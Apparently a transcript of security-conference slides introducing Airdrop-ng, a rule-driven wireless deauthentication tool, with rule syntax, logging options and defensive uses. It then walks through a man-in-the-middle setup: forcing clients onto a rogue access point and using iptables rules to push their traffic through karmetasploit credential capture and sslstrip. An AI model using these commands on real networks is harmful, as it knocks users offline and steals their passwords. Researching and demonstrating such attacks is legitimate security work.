Transcript Airdrop_ng3
Airdrop-ng
It Gets People Off
Who are we? No one important, move along citizen... TheX1le Tuna Will Speak for Beer
What are we doing here?
Talk about a new tool that allows the facilitation of client control through unencrypted management frames Demonstrate some uses of Airdrop-ng Show an interesting MiTM when we are finished
What does it do!?!?
We have all used tools like: aireplay-ng -0 mdk3 Void11 Introducing NEW Airdrop-ng Airdrop-ng is like these tools but much better Rules are the new sliced bread! Now enriched with vitamin PWN
Requirements Aircrack-ng Suite: • airodump-ng Lorcon-Old "Lorcon 1" Wireless Card/s: • 1 card is a minimum, 2 cards are preferable Optional Speed Increase: psyco JIT http://psyco.sourceforge.net/
Writing rules Rules are broken down in to 3 fields: action/ap/clients 2 options for state field 5 options for ap field 5 options for clients field Leading to 50 possible rule type combinations
The Rule fields: Action
action
/ap/client Accepts a single character action: a - allow d - deny
Rule Field Actions: Allow and Deny By default Airdrop-ng allows all wireless traffic...
Push Go with no rules = no fun Rules are parsed in the order they are written.
Sample rules for a slow night of drinking: Allow beer Deny liquor a/beer|any d/liquor|me
The Fields: AP Field action/
ap
/client ap Field: ESSID BSSID Company OUI name value Company OUI numeric value any
AP Field: Scenario action/
ap
/client
Scenario:
You do not want any clients connecting to a particular wireless network.
The target uses an ESSID of Brondo.
Solution: d/Brondo|any Deny access to anyone connecting to the target ap.
The Fields: Client Field action/ap/
client
mac multiple macs ex. mac1,mac2,mac3 Company OUI name value Company OUI numeric value any
The Fields: Client Field action/ap/
client
Scenario:
deny access to Sparkle Motion for everyone but my wireless card.
allow access to another access point that I am hosting.
a/SparkleMotion|33:26:36:00:00:00 a/00:33:FF:44:DD:32|any d/any|any
Advanced OUI Based Rules Rules based on vendor name or regex: Valid Rules: d/00:25:2C|any d/Apple Inc.|any d/apple|apple a/sony|any (regex matching)
Debug mode Turning on the -b flag enables debug mode.
This prints all rule matches out to the screen and allows you to troubleshoot your rules
Using Airdrop-ng Putting the pieces together....
Airdrop-ng Usage
Placing card in monitor mode
Starting Airodump-ng
Example airdrop-ng rule file
Running Airdrop-ng with d/any|any and debug mode on
Airdrop-ng running with debug mode turned on and d/apple|any
Logging Turning on -l will log all program output to a time stamped file in a logs folder in the current directory Used in conjunction with -b can be very useful to see what is going on
-l (that's L as in llama) switch adds logging. This creates a log directory inside your current working directory. It only outputs stdout and stderr. So if you do not have the debug switch you don't see all the rules that were triggered. Solution: Add the debug switch.
Notice we have moved into the logging directory. Reading the logs shows exactly who is kicked & the rule that kicked them.
Lets Get Some People Off!!!
BLAT
Demo: Make AppleSauce Steps: • put card in monitor mode • start airodump • • create rule file fire up airdrop-ng airmon-ng start wlan0 airodump-ng -w tuna --output-format csv wlan0 d/any|apple python airdrop-ng.py -b -i wlan0 -t tuna-01.csv -r apple.rules
laugh maniacally
Airdrop-ng Possible Uses • • • • • General Purpose Deauth tool Keeping Apple off your network Poor Man's WIPS Client Control Removing the air from the MacBook Air
Poor Man's WIPS Only allow your clients to talk to your access points, thus denying the users the ability to bypass your monitoring software.
Poor Man's WIPS continued
Scenario
: You wish to restrict your users to only your office access points.
Steps: Create a list of your wireless client macs 11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00 Create the list of AP BSSID's DE:AD:BE:EF:00:00 BE:EF:DE:AD:00:00
Poor Man's WIPS continued Create the rule file Allow 3 clients to talk to BE:EF:DE:AD:00:00 a/BE:EF:DE:AD:00:00|11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00 Allow 3 clients to talk to DE:AD:BE:EF:00:00 a/DE:AD:BE:EF:00:00|11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00 Deny those 3 clients to any other access points d/any|11:22:33:44:55:66,00:11:22:33:44:55,55:44:33:22:11:00 start airdrop-ng
Client Control Scenario Evil AP allowed to talk to all clients a/00:18:84:a2:eb:fd|any Allow your wireless card to talk to an AP with access to the intertubes a/any|00:17:F3:D4:32:CC Deny clients access to all other APs d/any|any
Sound Familiar?
Let's take a look back.....
Being too trusting
Clients are
really
trusting
If you say you're network
Foo
, you
must
be, right?
It's very hard to avoid really bad behavior as a user.
Remember before? Roaming sure looks a lot like spoofing
Attacks in use Using airdrop to facilitate a MITM
Description: Airdrop kicks all clients with injection interface.
Clients are brought in with the Karma interface and NATed to the Internet.
Add some rules...
Add airdrop rules a/00:18:84:a2:eb:fd|any d/any|any This will drop all clients unless they are connected to our karma adapter.
MiTM Fun • • • • • • • Client connects to network All traffic is redirected into metasploit capture modules with iptables markings Client opens browser and loads the http capture page with a redirect to google after 20 seconds Authentication iframes are loaded and passwords are logged An iptables rule is inserted that allows client access to port 53/dns Port 80/http gets redirected to the sslstrip proxy Clients are redirected through sslstrip to the Internet
IPTABLES Cheap NATing: iptables -F; iptables -t nat -F; iptables -t mangle -F iptables -t nat -A POSTROUTING -o $TUBES -j MASQUERADE Traffic Marking...hmmm sexy. Well all these bastards go to karmetasploit.
iptables -I PREROUTING 1 -t nat -i $EVILLAN -j MARK --set-mark 99 iptables -t nat -A PREROUTING -m mark --mark 99 -j DNAT --to-destination 10.0.0.1
Can't forget SSLStrip...Thanks Moxie.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 2222 Well they need DNS...Yes you dns tunnel outside of the network.
iptables -t nat -A PREROUTING -p tcp --destination-port 53 -j MARK --set-mark 53 iptables -t nat -A PREROUTING -p udp --destination-port 53 -j MARK --set-mark 53 All other ports that are not HTTP go back to karmetasploit.
iptables -t nat -A PREROUTING -m mark --mark 69 -j DNAT --to-destination 10.0.0.1
karmetasploit network Capture credentials of these services: pop3, ftp, imap, smtp, fakedns For HTTP Capture: captures saved browser passwords with a fake http service
So yea karmetasploit...Where’s teh tubes iptables -I PREROUTING 2 -t nat -s 1.2.3.4 -j MARK --set-mark 69 Ah the magic rule that takes people out of the karmetasploit network and gives them tubes.
Not unfettered tubes though. These tubes are special. The user is now allowed to use the proper DNS server that was issued in dhcp and can access the web through the SSLstrip Proxy.
Shouts HD.
sslstrip network proxy all web requests and redirect http to the client while establishing an ssl tunnel to the site from the proxy Now log into Facebook; Bitch.
Shouts to Moxie.
MiTM Fun Continued....
start the setup script • • • • • bring teh internet up Al Gore style sets up internal gateway (iptables, nat, dhcp) bring up karmetasploit network mark all traffic to karmetasploit network bring up sslstrip network
Demo MiTM
Future directions for Airdrop-ng • • • • Integrated packet sniffer o No more dependency on airodump-ng Take rules on the command line instead reading from a file Rule based wireless fuzzing framework Log File time stamps
Where did we go today Recap: Clients still a very easy target Wireless Deauth Rules = Next Sliced Bread Airdrop-ng is great for facilitating a shim for MiTM attacks & Client Control Management frame abuse is still a very viable attack vector
Shouts
Roamer, Marfi, Mubix, Zero_Chaos, Rel1k, LateNite, d4s, fishsticks, and mellencock For their hard work: HDM, Moxie, dragorn TheX1le: thex1le{-at-}gmail Tuna: secretpackets{-at-}gmail
• • • • • Pen-testing Live CD 2009.0 Release Available at www.pentoo.ch
Updated tools and drivers patched and ready Airdrop-ng Module available in two weeks See the Pentoo Firetalk in Wilson at 8:45pm